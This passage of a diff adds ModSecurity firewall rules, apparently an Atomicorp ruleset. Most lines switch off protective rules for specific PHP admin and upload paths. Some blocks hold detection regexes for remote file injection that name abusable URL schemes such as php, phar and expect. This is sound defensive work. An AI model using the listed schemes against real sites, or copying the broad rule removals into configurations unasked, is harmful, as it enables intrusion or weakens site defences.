emovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/tbl_structure\.php" "phase:2,id:92187,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/imagens\.php" "phase:2,id:92188,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/app_dev\.php" "phase:2,id:92189,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/generator/index\.php" "phase:2,id:92190,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390712"
+
+SecRule REQUEST_FILENAME "/admin/item_processor\.php" "phase:2,id:92191,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/editcode/" "phase:2,id:92192,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/admin/pages/thememail\.php" "phase:2,id:92193,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/admin/pages/themechooser\.php" "phase:2,id:92194,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/thumbopen\.php" "phase:2,id:92195,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:92196,t:none,pass,nolog,skipAfter:END_RULES_92196"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:341726,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:src "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341727,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92196
+
+SecRule REQUEST_FILENAME "/sendmessage\.php" "phase:2,id:92197,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/admin-themes-editor\.php" "phase:2,id:92198,t:none,t:lowercase,pass,nolog,noauditlog"
+
+SecRule REQUEST_FILENAME "/kangooadmin/index\.php" "phase:2,id:92199,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/business_profile_engine\.php" "phase:2,id:92200,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029"
+
+SecRule REQUEST_FILENAME "/backmin/index\.php" "phase:2,id:92201,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/livechat/ajax/footprints\.php" "phase:2,id:92202,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/typo3conf/" "phase:2,id:92203,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/ntunnel_mysql\.php" "phase:2,id:92204,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/magmi_saveprofile\.php" "phase:2,id:92205,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/magmi_saveconfig\.php" "phase:2,id:92206,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/details\.php" "phase:2,id:92207,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390614"
+
+SecRule REQUEST_FILENAME "/detail_ispravak\.php" "phase:2,id:92208,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/page/addedit\.php" "phase:2,id:92209,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"
+
+SecRule REQUEST_FILENAME "/booking_apartman_podaci\.php" "phase:2,id:92210,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/sfpadmin\.php" "phase:2,id:92211,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/iwp/ajax\.php" "phase:2,id:92212,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/setup/config\.php" "phase:2,id:92213,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/ziegenproblem\.php" "phase:2,id:92214,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/image\.php" "phase:2,id:92215,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:92216,t:none,pass,nolog,skipAfter:END_RULES_92216"
+
+SecRule ARGS|!ARGS:pagex|!ARGS:/refer/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:f "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:341737,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:pagex|!ARGS:/refer/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:f "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341738,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92216
+
+SecRule REQUEST_FILENAME "/unesi\.komentar\.inc\.php" "phase:2,id:92217,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/tiki-auto_save\.php" "phase:2,id:92218,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/querywindow\.php" "phase:2,id:92219,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/static_content_editresult_mobile\.php" "phase:2,id:92220,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/form/configuration\.php" "phase:2,id:92221,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/site_checker\.php" "phase:2,id:92222,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390712"
+
+SecRule REQUEST_FILENAME "/ins_upd_data\.php" "phase:2,id:92223,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/ajaxfilemanager\.php" "phase:2,id:92224,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"
+
+SecRule REQUEST_FILENAME "/ajax_get_file_listing\.php" "phase:2,id:92225,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"
+
+SecRule REQUEST_FILENAME "/admin/assets/inc/bin/general\.services\.php" "phase:2,id:92226,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/ajax_image_editor\.php" "phase:2,id:92227,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"
+
+SecRule REQUEST_FILENAME "/beheer/toolboxx\.php" "phase:2,id:92228,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/aktualnolight_elementi\.php" "phase:2,id:92229,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/counterize/counterize\.php" "phase:2,id:92230,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/modules/v6_pages_engine\.php" "phase:2,id:92231,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/modules/v7_pages_engine\.php" "phase:2,id:92232,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340016"
+
+SecRule REQUEST_FILENAME "/wwwsqldesigner/" "phase:2,id:92233,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/bottom\.php" "phase:2,id:92234,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:92235,t:none,pass,nolog,skipAfter:END_RULES_92235"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:module "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "capture,phase:2,deny,log,auditlog,status:403,id:341739,chain,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:module "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341740,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',logdata:'%{MATCHED_VAR}'"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92235
+
+SecRule REQUEST_FILENAME "/clients/admin/addonmodules\.php" "phase:2,id:92236,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/graps-cms\.php" "phase:2,id:92237,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/sadrzajdrag_elementi\.php" "phase:2,id:92238,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/listaproperty\.php" "phase:2,id:92239,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/plazadmin\.php" "phase:2,id:92240,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/filtteri" "phase:2,id:92241,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/cgi-bin/jrscgi/update\.cgi" "phase:2,id:92242,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/imagemanager/stream/index\.php" "phase:2,id:92243,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390704"
+
+SecRule REQUEST_FILENAME "/wp-admin/user-edit\.php" "phase:2,id:92244,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/options-website\.php" "phase:2,id:92245,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/savefile\.html" "phase:2,id:92246,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380016"
+
+SecRule REQUEST_FILENAME "/database/cashtrack\.php" "phase:2,id:92247,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/winkelmodule/naardab\.php" "phase:2,id:92248,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/write-post\.php" "phase:2,id:92249,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/website/beheer/edit\.php" "phase:2,id:92250,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/potenzen_1_formmailer\.php" "phase:2,id:92251,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/admin/catalogusbijwerken\.php" "phase:2,id:92252,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/livechat/server\.php" "phase:2,id:92253,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin_updatemedia\.php" "phase:2,id:92254,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/afg_img_rsz\.php" "phase:2,id:92255,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
